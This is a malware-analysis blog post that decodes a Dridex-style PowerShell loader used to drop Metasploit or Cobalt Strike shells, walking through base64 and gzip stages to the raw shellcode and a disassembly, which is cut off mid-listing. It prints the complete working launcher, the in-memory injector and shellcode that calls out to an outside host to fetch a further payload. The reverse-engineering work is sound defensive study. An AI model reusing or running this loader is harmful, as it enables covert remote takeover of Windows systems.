Dridex Loader Technique Used For MSF Shells
Recently we keep seeing this same/simliar payload(s) over and over on Pastebin. Netscylla first came across a similar sample payload in 2016 used in a Dridex campaign targeting corporations via Phishing and fake Invoices which then proceeded to install the infamous banking Trojan. We at Netscylla have on many occasions used this sample to modified it with our own code and thrown it back at Blue Teams during simulated Red Teaming. Below is an outline of how to reverse and rebuild the sample.
A copy of our sample for analysis can be found here:
Initial Decode
For now we will start from the encoded Powershell (but usually the sample is packaged up further as an obfuscated VBA macro inside a Word Document):
powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEASAB4AFQAWQBGAG8AQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwAzAEUAcgA5AEQAMQBhAEYAaABKAEUASQAyAEkAUwBrAFQAYQBSAEsAWgAvAE4ATwBnAEEARABHAGQAZwB4AEYAMQBXAEsAdgA3AFkAVwAxAGwAOQBwAHIAMwBuAHIAOQA3AHoAZgBtAEoAUwBHAFgANQBLADcAVgA2AFYAWgBZAHIASABkAG0AZABtAGUAZQBlAFcAYgBIAGIAaABMAGEAbgBMAEIAUQBDAE0AbwBqAFYAZgBqAHgANABmADIANwBQAG8AcABRAEkASQBnAFoALwB2AG4AZQB2ADgAcwBMAEcAUgBvAFAARABHAFYAbAB1AEwAYgBzADUAdAA2ADkAQQA0AFUATQBkAGsAcgBXADIASgA3AE4ASgBPAEcATABJAEUANgBVADUAYgBMAEsAQQBrAFQAQwA2AGUAMQB0AEoAWQBrAGkASABQAEwARABlADYARwBCAHUAUgBMAEgATwBKAGgAUgBnAG0ATQB4AEoALwB3AHAAbQBEADYATwA4AE0AWAA5AGIASQA1AHQATAB2AHcAUQBNAHQAOABLAEQAYwBwAG0AaQBCADcAVgB0AGgAVgBrACsAMQBpADQAVQBFAEkAbgBsAFgAVwBZAGoAVgBMAGYAQwB0AHEAUwBFAGkANQBtAHYAMwA3AE4ANQBpAFkAWAA4AHIAUgBRACsANQA0AGcARwBvAHQAWgBiAFIAdAB6AEgAQgBRAGMAUwByAE0ANQA0AFcAYwB1AFAAWABDADAAWABXAEkAeAAyAHkAVgAyAHgARwBMAG0AOABvAEoASgB3AHMAdABTAFEAUQA5AGoANQBPAEkAZQA3AEwAYgBDAFgAYwB4ADkANQBzAFQAWgBIAEkAUQBDAHYAdwBqAHoASgBBAHEARgBwADYARABTAFgAUQA0ADYAWQBoAGEAbQAvAFkAagBaAGkAdQBOAEUATwBBAGEAVABRAGkAdABjAHMAUQBVAFcATQAyAEYAQwBhAFYANwA0AFEANQB3AGMAWABSAGcAbQBJAFMAYwBCAEIAagBuAEgARQBWAHQAcQBPAEYAbwBSAEcAOABlAEYASgBnAG8AZABpAG8AZgBZAG4AWQBvADkAdgBEADUARgAvAHEAdABHADQAcgBrAFIAYQBQAFYANQBsAE0AdABEAGEAdAA3AHkAdABjAHUAYwBoAE8ASwBEAGUAVABiADMAMAB0AHQARABUAG4ATQB3AC8AcABaAFgAdwBPAEwAbgBoAC8AYwBmADMAcgBzAG4ATgBrAFEATgBVAGoAMQBuAEEAOAB6AGUAVABmAFoAegBEAEwANgBLAGYAUgBhAFQAdgBkADQAWABRAGMAbwBMAFgAVABnAFEAYwBSAFoAdAA0AFQAVQB6AGkAaABLAGMAbQB3AHEAVABOAEIARwBUADYAVgBUAEkAYwBHADAAbgBOADIAYQA5AGEAbABlAHgAOAAyADkAdgBJADUAOQBzAHcARwBMAFoANgBaAFQATAB5ADUASgAxADEAdwBYAEIAeABHAEQARQBtAFkATABoAE0AVgArAFoANwA0ADAAbQBhAHEAZQBDAHQANABsAFgAeABTADQASgBjAFgAVQBiAG8AbwBEAFkASgAyADYASgByADIAVQBBAHUAeABUAHYASQB5ADYAYwAxAEgAcgBnAG0ANQBnADkAQwByAEIAVAB4AFIAUgA3AGkASwBkAHcANQBvAFgASgBTADcATgBhAFEAUABpAGoAcgBaAG8AUQA2AHUAQgBJAHMAUwBHAEwATQBYAGcARgBDAGMANAA5AGQAKwBhAFEASQBUAEgAYgBDAHIAcwA0AEEATQBRAE8ANwAxAGwASQBoAHcAdQBNAHgAaQBmAHQASQA0AHUAMwBwADkAUABUAGQAMQBEAEsAVgBpAGkASwA0ADcAegBRAFQANgBDAGsANwBMAHkAZwBZAFUAUwB4AGsAeABlAFUATQBDAFoASABrAFoASgB3AHQAcAA5AG0AbgA5AHoAdABKAHAAUQBUAEcAOABYADgAdABOADAAMAA5AHcAagBrADgAYwBBAEsAQwAyAE0AZQBKAFQAWgBrAEUAWQBJAGYAYQBVAHQAcwBFADAAUgBUAEwAUABKAEMAawB6AGgAWQAzAFcAcgBFAE8AeAAyAGMAZgBSAFcASgBDAHEASwBVAGgAQgA3AHMAdABJAEoATQB3AEUAcQBLAGcATQBaAFQAYgBrAFQAZwA0AHoAawBQAGMAZwBVAE4AOAAxAGEAdwBwAEQAZwBBADEAWAAyAE4AMQB5AG4AeQBvAEsASwBQAEoAYgBIAG4ARgBQAEsAdwBrADMAMwBoADYAWQBuAHUAQgAyADYAbgBvAEoAegBRAE8AUABNAFQATQBxADEAUgB4AHYATwBDAFEAUwBJAE8AZAAwAFUASwA4AEIATwByAC8AcABNAHoAWgAxAGYARwB3AGEAMQBLAGgASQA4AFoARQBrADkAbABOAEYARwAzAFAAQwBWAC8ASgB0AEwAcQB6AGoAZQBOAG8AVgBIAEsAMQB5AE4AawBlADQAQQBpAEQAdQBEAFUASQB4AGEAbwBLAE0AYgBYAFoAWQAxAEgAQQBKADMANABzAFgAaABQAEsAZwBvAE0AcQB4AFgAUwByAHEAMAB1AGkASwB5AHMAaQBkAHoAcQB3AHEATwBUAHkAeABhAHIAZgBuAEwAdQAyAHYATgBtAE0AYQBwAHUAZgBGAGQAcAB4AGEAMQB1AHMAMQA4AGQATgBKAHYAbABWAFYAcwB6AHkAbAB5AHIAdABmAGgAZAB2ADgAVwA3AHQAWQBmADUAWABGAE8AYQBRADkAMwBpADQANQBiAFMASABCAEYAcABZAFoAVgAzAHkAegBiAFoAYQBSADMARgBzAFQAYgBGADYANQAyADYAVwAwAHYAcQBaAGoAZgAzAEgATgBlAHEAdQBxADcAMwB5AGQAVwBHADgAbABXAGQAZABNAHoASwBRAEoAVgBLAHEARgBPAHQASgBSADEAVABYAGEAdABTAE8AYQA2AFIAZABYAE4AQQA5AE0ARwBpAFgAZQBjAHoAeQA2AEIASQBkADQAdgBlAGcAMwB5AEQAeQBLAFkAVAB6AFEAMgBaAHoAUQBKAEQAVQBoAHIAKwBKAFQASwB2AGwAawBiAEQANwB6AHAAYgBxADEAbQA4ADAAVABjAGwAdQBUAGYAUwA0AFUASABWAHAAWQBtAFIAVwA1AFEATgBtAEgAdQB3AFYAdgBJADEAMAAxAE8AVQA2ADUANgBVAGgAcgBzAGEAMQBSADAAeQBJAGoATABDAGkALwBGAG8AOQBOAEQAcgBtAGEAYQA5AFEAWABRAGMAYQBzAEcANABOAFoAWgB1ACsAdQBPAEgAMQB0AFoAbwB0AEgAVgBMAHQAeQA2AE4AQgAwAHEATQBTADkAVQB5ADYAZgBLACsAWQB3ADUAcgBoAHIAbABaAE8ARAByAFgANwBOAEMANABuAHMAMgBIAGIASwBBADcAbABxAFAANwBxAHoARwBjAFAASgBQADgAZwBiAFAAegBhADgAZwBZAFgAbAB0AEIAZgBXADcAcwBlAGsAYgBIAE4AQgBBAEsAMgBzAHgAYQBxAHcATgBVAHgAKwAzAHcAOAA2AHcAbwBXADIARgBEAEwAMwBsAEsATgA2AG4AVQBVAG4AOABOAHUAVwBlAGkAZQAyADUAMAA1AHEAdQBpAFAAQgA1AC8AcgA5AEEAYgA1AGcARgBaAGwARgBiAG8ASQBXADgANABRAFAANgBOAGkAWgBwAEcASQAyAFMAegBmAFUAeAA2AHEAbAArAFIARwBvADAAbQA2AEYAcwBQAGkAagBQAHcAKwA0ADQAVABNAGgAMQBpAFYAQgBwAEwAQgBTAG4ASwBRAEYARgBVAEIAbwArAGkAMQBIAHYATQB2AEIAdQBPAHIAdAB5AGkAcwBZAEMAegBDAEgAWQBlAFEAQQA2AGEANgBzAGcASQBQAE8AQgB0AFMASQBvADMAWgBuADMAZABIAFAAWABKADIAbABiAFgAWgBkAGcAUABHADkAWgBhAEwAagBLAG4AQwBPAE8AUwArAGgARABMAHcAagBMAGIAZgBuAGQAVQAyADMAUQBDAGYAMgBVADMAaAA2AHQATwBjAEwATQBkAHIAeQB1AGYAUABuAGQATQBZAGcAUgBNADAAWQB0AEYANAAyAFAASwBXAEsAQgBzAEoAbABiAG4ARABYAE8AbgBmADcAdQA2ADIAcAAxAFIAOABhADAARwAxAEUAVgBSADcAQwBNAEsARgBJAFcAbQBjAHIAbwAwADYAaQB5AHEASAA5AHQARABuADUASABVAFEAaABUADMASAB3ADAATABIAEkAVwBZAFEAcABlAEYAUABuAHcAcQBPAEkAVgBTAFoAcQBlADkAYQB0ADkASQBvAEUAOABlAHUAdABjAFUAYgBnADQAZABwAHAAZQBsAFYAMgBjADUANABWAEUAeAA5ADkAUwArAFQAawB1ADMAdAAyAFAAdwBFAG8AcgAzAHMAYQBvAEsASABSAHgANgAzAE0AOQBMAG0AMAB0AEoAZwBrAFkAawBiAGMAbwBTAFIAUAB6AHIANABWAFgAWQBjAGkAcwArADcAWgBkAFAAdQA5AGsANQBWAHMAOABPAG8ALwB2AEQAYwBtAG0AQgBaADkAaAA0ADAANABJADcASgBsAEMARAArAC8AOABYAHoAKwBQAHQANABzAE8AZgA4ADIAOQA0AFAAcQAzADkAZwAvAFMAWABNAEoAYgB5AHoAMQBCADQASQBYADIAKwA4AEYAdQBRAC8AegBZAEMASgBpAEkAYwBOAEQAVwA0AEkAQwBrACsAdABPAC8AWABnAFQAaAB5ADYATwB5ADcANQB5AHgATAB3AEIASAAzAE8ATgBJAFAAMABmAHUARQBYAC8AVABnAHEAKwBnAHYAYwBZADYATAB5AGYAOABLAEEAQQBBAD0AJwAnACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7ACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
On Windows Defender this payload is immediately flagged as Powershell/Ploty.E!
First we decode the sample using Base64 and UTF-16LE (http://gchq.github.io/CyberChef) can make quick work of this!
Or use the following Linux/OSX command line:
base64 -d sample | iconv -f UTF-16LE -t UTF-8
More Decoding…
if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAHxTYFoCA7VWbW/aSBD+3Er9D1aFhJEI2ISkTaRKZ/NOgADGdgxF1WKv7YW1l9pr3nr97zfmJSGX5K7V6VZYrHdmdmeeeWbHbhLanLBQCMojVfjx4f27PopQIIgZ/vnev8sLGRoPDGVluLbs5t69A4UMdkrW2J7NJOGLIE6U5bLKAkTC6e1tJYkiHPLDe6GBuRLHOJhRgmMxJ/wpmD6O8MX9bI5tLvwQMt8KDcpmiB7VthVk+1i4UEInlXWYjVLfCtqSEi5mv37N5iYX8rRQ+54gGotZbRtzHBQcSrM54WcuPXC0XWIx2yV2xGLm8oJJwstSQQ9j5OIe7LbCXcx95sTZHIQCvwjzJAqFp6DSXQ46Yham/YjZiuNEOAaTQitcsQUWM2FCaV74Q5wcXRgmIScBBjnHEVtqOFoRG8eFJgodiofYnYo9vD5F/qtG4rkRaPV5lMtDat7ytcuchOKDeTb30ttDTnMw/pZXwOLnh/cf3rsnNkQNUj1nA8zeTfZzDL6KfRaTvd4XQcoLXTgQcRZt4TUzihKcmwqTNBGT6VTIcG0nN2a9alex829vI59swGLZ6ZTLy5J11wXBxGDEmYLhMV+Z740maqeCt4lXxS4JcXUbooDYJ26Jr2UAuxTvIy6c1Hrgm5g9CrBTxRR7iKdw5oXJS7NaQPijrZoQ6uBIsSGLMXgFCc49d+aQITHbCrs4AMQO71lIhwuMxiftI4u3p9PTd1DKViiK47zQT6Ck7LygYUSxkxeUMCZHkZJwtp9mn9ztJpQTG8X8tN009wjk8cAKC2MeJTZkEYIfaUtsE0RTLPJCkzhY3WrEOx2cfRWJCqKUhB7stIJMwEqKgMZTbkTg4zkPcgUN81awpDgA1X2N1ynyoKKPJbHnFPKwk33h6YnuB26noJzQOPMTMq1RxvOCQSIOd0UK8BOr/pMzZ1fGwa1KhI8ZEk9lNFG3PCV/JtLqzjeNoVHK1yNke4AiDuDUIxaoKMbXZY1HAJ34sXhPKgoMqxXSrq0uiKysidzqwqOTyxarfnLu2vNmMapufFdpxa1us18dNJvlVVszylyrtfhdv8W7tYf5XFOaQ93i45bSHBFpYZV3yzbZaR3FsTbF6526W0vqZjf3HNequq73ydWG8lWddMzKQJVKqFOtJR1TXatSOa6RdXNA9MGiXeczy6BId4veg3yDyKYTzQ2ZzQJDUhr+JTKvlkbD7zpbq1m80TcluTfS4UHVpYmRW5QNmHuwVvI101OU656Uhrsa1R0yIjLCi/Fo9NDrmaa9QXQcasG4NZZu+uOH1tZotHVLty6NB0qMS9Uy6fK+Yw5rhrlZODrX7NC4ns2HbKA7lqP7qzGcPJP8gbPza8gYXltBfW7sekbHNBAK2sxaqwNUx+3w86woW2FDL3lKN6nUUn8NuWeie2505quiPB5/r9Ab5gFZlFboIW84QP6NiZpGI2SzfUx6ql+RGo0m6FsPijPw+44TMh1iVBpLBSnKQFFUBo+i1HvMvBuOrtyisYCzCHYeQA6a6sgIPOBtSIo3Zn3dHPXJ2lbXZdgPG9ZaLjKnCOOS+hDLwjLbfndU23QCf2U3h6tOcLMdryufPndMYgRM0YtF42PKWKBsJlbnDXOnf7u62p1R8a0G1EVR7CMKFIWmcro06iyqH9tDn5HUQhT3Hw0LHIWYQpeFPnwqOIVSZqe9at9IoE8eutcUbg4dppelV2c54VEx99S+Tku3t2PwEor3saoKHRx63M9Lm0tJgkYkbcoSRPzr4VXYcis+7ZdPu9k5Vs8Oo/vDcmmBZ9h404I7JlCD+/8Xz+Pt4sOf8294Pq39g/SXMJbyz1B4IX2+8FuQ/zYCJiIcNDW4ICk+tO/XgThy6Oy75yxLwBH3ONIP0fuEX/Tgq+gvcY6Lyf8KAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); Another Defender Alert:Plasti.A!
Even More decoding…
I bolded IO.Compression.GzipStream above, as sometimes the Threat actors replace this with inflate, zlib or other supported (de)compression algorithms, becare here, or you will end up with gibberish rather than the sample:
function m4TB {
Param ($t8OhK, $lsQVAvVfc1f)
$ed2YZcbb0 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $ed2YZcbb0.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($ed2YZcbb0.GetMethod('GetModuleHandle')).Invoke($null, @($t8OhK)))), $lsQVAvVfc1f))
}
function rGiD {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $tSz1GbNDMAc,
[Parameter(Position = 1)] [Type] $pLL44p2YKM = [Void]
)
$qGHaJ = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$qGHaJ.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $tSz1GbNDMAc).SetImplementationFlags('Runtime, Managed')
$qGHaJ.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $pLL44p2YKM, $tSz1GbNDMAc).SetImplementationFlags('Runtime, Managed')
return $qGHaJ.CreateType()
}
[Byte[]]$rSFd_SoaT = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1obmV0AGh3aW5pVGhMdyYH/9Ux21NTU1NTaDpWeaf/1VNTagNTU2hSWgAA6N0AAAAvTFdiTi1aekZTTXNNWWcxalZnSmZIZ09PZXIyVGJUYUY3VXliV3BYWlpOLWREVWxkdUtScnV6bjRoQUdYdUhvZTU1b0hQdzhEaVR6YmFjVzNVLWVaamJoYwBQaFeJn8b/1YnGU2gAMuCEU1NTV1NWaOtVLjv/1ZZqCl9ogDMAAIngagRQah9WaHVGnob/1VNTU1NWaC0GGHv/1YXAdQhPddnoUgAAAGpAaAAQAABoAABAAFNoWKRT5f/Vk1NTiedXaAAgAABTVmgSloni/9WFwHTPiwcBw4XAdeVYw1/od////3lhYmFkYWJhMTExLmhvcHRvLm9yZwC78LWiVmoAU//V")
$sBjGWzU_55z = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((m4TB kernel32.dll VirtualAlloc), (rGiD @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $rSFd_SoaT.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($rSFd_SoaT, 0, $sBjGWzU_55z, $rSFd_SoaT.length)
$oZxIewSmBmO = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((m4TB kernel32.dll CreateThread), (rGiD @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$sBjGWzU_55z,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((m4TB kernel32.dll WaitForSingleObject), (rGiD @([IntPtr], [Int32]))).Invoke($oZxIewSmBmO,0xffffffff) | Out-Null
This next bit is not so difficult, a straight base-64 decode. The code above should look familiar as its used by many Powershell exploit kits, and also a very similar version exists in Empire.
Base64 decoding the Base64String leaves us with the following binary stub code:
fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d686e6574006877696e6954684c772607ffd531db5353535353683a5679a7ffd553536a03535368525a0000e8dd0000002f4c57624e2d5a7a46534d734d5967316a56674a6648674f4f6572325462546146375579625770585a5a4e2d6444556c64754b5272757a6e346841475875486f6535356f485077384469547a6261635733552d655a6a62686300506857899fc6ffd589c653680032e08453535357535668eb552e3bffd5966a0a5f688033000089e06a04506a1f566875469e86ffd55353535356682d06187bffd585c075084f75d9e8520000006a4068001000006800004000536858a453e5ffd593535389e7576800200000535668129689e2ffd585c074cf8b0701c385c075e558c35fe877ffffff79616261646162613131312e686f70746f2e6f726700bbf0b5a2566a0053ffd5
The start of the hex dump is very familiar and looks like a 32-bit Windows payload commonly supplied from Metasploit or Cobalt-Strike. We use the Open-source tool Radare2 to reverse this code into assembler to verify the library calls, and any socket connections.
I like to use the following command to dissassemble payloads:
cat sample |xxd -pr|awk '{printf "%s", $0}'|xargs rasm2 -a x86 -D
Raw Payload Analysis
We have added a few comments e.g. ; hash(“kernel32.dll”,”LoadLibraryA”)to the the code to make this analysis, easier for newer members of the Team:
MD5(../../sample.bin.data)= a729ceb472eaa8a0912cd5869b2b4f28 SHA1(../../sample.bin.data)= 4f4e859a56091c0d0cbf4fcfd9e7e07b4d9fbba1 cat sample |xxd -pr|awk '{printf "%s", $0}'|xargs rasm2 -a x86 -D 0x00000000 1 fc cld 0x00000001 5 e882000000 call 0x88 0x00000006 1 60 pushad 0x00000007 2 89e5 mov ebp, esp 0x00000009 2 31c0 xor eax, eax 0x0000000b 4 648b5030 mov edx, [fs:eax+0x30] 0x0000000f 3 8b520c mov edx, [edx+0xc] 0x00000012 3 8b5214 mov edx, [edx+0x14] 0x00000015 3 8b7228 mov esi, [edx+0x28] 0x00000018 4 0fb74a26 movzx ecx, word [edx+0x26] 0x0000001c 2 31ff xor edi, edi 0x0000001e 1 ac lodsb 0x0000001f 2 3c61 cmp al, 0x61 0x00000021 2 7c02 jl 0x25 0x00000023 2 2c20 sub al, 0x20 0x00000025 3 c1cf0d ror edi, 0xd 0x00000028 2 01c7 add edi, eax 0x0000002a 2 e2f2 loop 0x10000001e 0x0000002c 1 52 push edx 0x0000002d 1 57 push edi 0x0000002e 3 8b5210 mov edx, [edx+0x10] 0x00000031 3 8b4a3c mov ecx, [edx+0x3c] 0x00000034 4 8b4c1178 mov ecx, [ecx+edx+0x78] 0x00000038 2 e348 jecxz 0x82 0x0000003a 2 01d1 add ecx, edx 0x0000003c 1 51 push ecx 0x0000003d 3 8b5920 mov ebx, [ecx+0x20] 0x00000040 2 01d3 add ebx, edx 0x00000042 3 8b4918 mov ecx, [ecx+0x18] 0x00000045 2 e33a jecxz 0x81 0x00000047 1 49 dec ecx 0x00000048 3 8b348b mov esi, [ebx+ecx*4] 0x0000004b 2 01d6 add esi, edx 0x0000004d 2 31ff xor edi, edi 0x0000004f 1 ac lodsb 0x00000050 3 c1cf0d ror edi, 0xd 0x00000053 2 01c7 add edi, eax 0x00000055 2 38e0 cmp al, ah 0x00000057 2 75f6 jnz 0x10000004f 0x00000059 3 037df8 add edi, [ebp-0x8] 0x0000005c 3 3b7d24 cmp edi, [ebp+0x24] 0x0000005f 2 75e4 jnz 0x100000045 0x00000061 1 58 pop eax 0x00000062 3 8b5824 mov ebx, [eax+0x24] 0x00000065 2 01d3 add ebx, edx 0x00000067 4 668b0c4b mov cx, [ebx+ecx*2] 0x0000006b 3 8b581c mov ebx, [eax+0x1c] 0x0000006e 2 01d3 add ebx, edx 0x00000070 3 8b048b mov eax, [ebx+ecx*4] 0x00000073 2 01d0 add eax, edx 0x00000075 4 89442424 mov [esp+0x24], eax 0x00000079 1 5b pop ebx 0x0000007a 1 5b pop ebx 0x0000007b 1 61 popad 0x0000007c 1 59 pop ecx 0x0000007d 1 5a pop edx 0x0000007e 1 51 push ecx 0x0000007f 2 ffe0 jmp eax 0x00000081 1 5f pop edi 0x00000082 1 5f pop edi 0x00000083 1 5a pop edx 0x00000084 2 8b12 mov edx, [edx] 0x00000086 2 eb8d jmp 0x100000015 0x00000088 1 5d pop ebp 0x00000089 5 686e657400 push 0x74656e 0x0000008e 5 6877696e69 push 0x696e6977 ; wininet,0 0x00000093 1 54 push esp 0x00000094 5 684c772607 push 0x726774c ; hash("kernel32.dll","LoadLibraryA") 0x00000099 2 ffd5 call ebp 0x0000009b 2 31db xor ebx, ebx 0x0000009d 1 53 push ebx 0x0000009e 1 53 push ebx 0x0000009f 1 53 push ebx 0x000000a0 1 53 push ebx 0x000000a1 1 53 push ebx 0x000000a2 5 683a5679a7 push 0xa779563a ; hash("wininet.dll","InternetOpenA") 0x000000a7 2 ffd5 call ebp 0x000000a9 1 53 push ebx 0x000000aa 1 53 push ebx 0x000000ab 2 6a03 push 0x3 0x000000ad 1 53 push ebx 0x000000ae 1 53 push ebx 0x000000af 5 68525a0000 push 0x5a52 0x000000b4 5 e8dd000000 call 0x196 0x000000b9 1 2f das 0x000000ba 1 4c dec esp 0x000000bb 1 57 push edi 0x000000bc 3 624e2d bound ecx, [esi+0x2d] 0x000000bf 1 5a pop edx 0x000000c0 2 7a46 jp 0x108 0x000000c2 1 53 push ebx 0x000000c3 1 4d dec ebp 0x000000c4 2 734d jae 0x113 0x000000c6 1 59 pop ecx 0x000000c7 4 67316a56 xor [bp+si+0x56], ebp 0x000000cb 2 674a a16 dec edx 0x000000cd 2 6648 dec ax 0x000000cf 2 674f a16 dec edi 0x000000d1 1 4f dec edi 0x000000d2 3 657232 jb 0x107 0x000000d5 1 54 push esp 0x000000d6 4 62546146 bound edx, [ecx+0x46] 0x000000da 1 37 aaa 0x000000db 1 55 push ebp 0x000000dc 2 7962 jns 0x140 0x000000de 1 57 push edi 0x000000df 2 7058 jo 0x139 0x000000e1 1 5a pop edx 0x000000e2 1 5a pop edx 0x000000e3 1 4e dec esi 0x000000e4 5 2d6444556c sub eax, 0x6c554464 0x000000e9 3 64754b jnz 0x137 0x000000ec 1 52 push edx 0x000000ed 2 7275 jb 0x164 0x000000ef 2 7a6e jp 0x15f 0x000000f1 2 3468 xor al, 0x68 0x000000f3 1 41 inc ecx 0x000000f4 1 47 inc edi 0x000000f5 1 58 pop eax 0x000000f6 2 7548 jnz 0x140 0x000000f8 1 6f outsd 0x000000f9 6 6535356f4850 xor eax, 0x50486f35 0x000000ff 2 7738 ja 0x139 0x00000101 1 44 inc esp 0x00000102 8 69547a6261635733 imul edx, [edx+edi*2+0x62], 0x33576361 0x0000010a 1 55 push ebp 0x0000010b 5 2d655a6a62 sub eax, 0x626a5a65 0x00000110 5 6863005068 push 0x68500063 0x00000115 1 57 push edi 0x00000116 6 899fc6ffd589 mov [edi-0x762a003a], ebx 0x0000011c 1 c6 invalid 0x0000011d 1 53 push ebx 0x0000011e 5 680032e084 push 0x84e03200 ; hash("wininet.dll", "HttpOpenRequestA”) 0x00000123 1 53 push ebx 0x00000124 1 53 push ebx 0x00000125 1 53 push ebx 0x00000126 1 57 push edi 0x00000127 1 53 push ebx 0x00000128 1 56 push esi 0x00000129 5 68eb552e3b push 0x3b2e55eb ; hash("wininet.dll","HttpOpenRequestA") 0x0000012e 2 ffd5 call ebp 0x00000130 1 96 xchg esi, eax 0x00000131 2 6a0a push 0xa 0x00000133 1 5f pop edi 0x00000134 5 6880330000 push 0x3380 0x00000139 2 89e0 mov eax, esp 0x0000013b 2 6a04 push 0x4 0x0000013d 1 50 push eax 0x0000013e 2 6a1f push 0x1f 0x00000140 1 56 push esi 0x00000141 5 6875469e86 push 0x869e4675 ; hash("wininet.dll", "InternetSetOptionA”) 0x00000146 2 ffd5 call ebp 0x00000148 1 53 push ebx 0x00000149 1 53 push ebx 0x0000014a 1 53 push ebx 0x0000014b 1 53 push ebx 0x0000014c 1 56 push esi 0x0000014d 5 682d06187b push 0x7b18062d ; hash("wininet.dll","HttpSendRequestA") 0x00000152 2 ffd5 call ebp 0x00000154 2 85c0 test eax, eax 0x00000156 2 7508 jnz 0x160 0x00000158 1 4f dec edi 0x00000159 2 75d9 jnz 0x100000134 0x0000015b 5 e852000000 call 0x1b2 0x00000160 2 6a40 push 0x40 0x00000162 5 6800100000 push 0x1000 0x00000167 5 6800004000 push 0x400000 0x0000016c 1 53 push 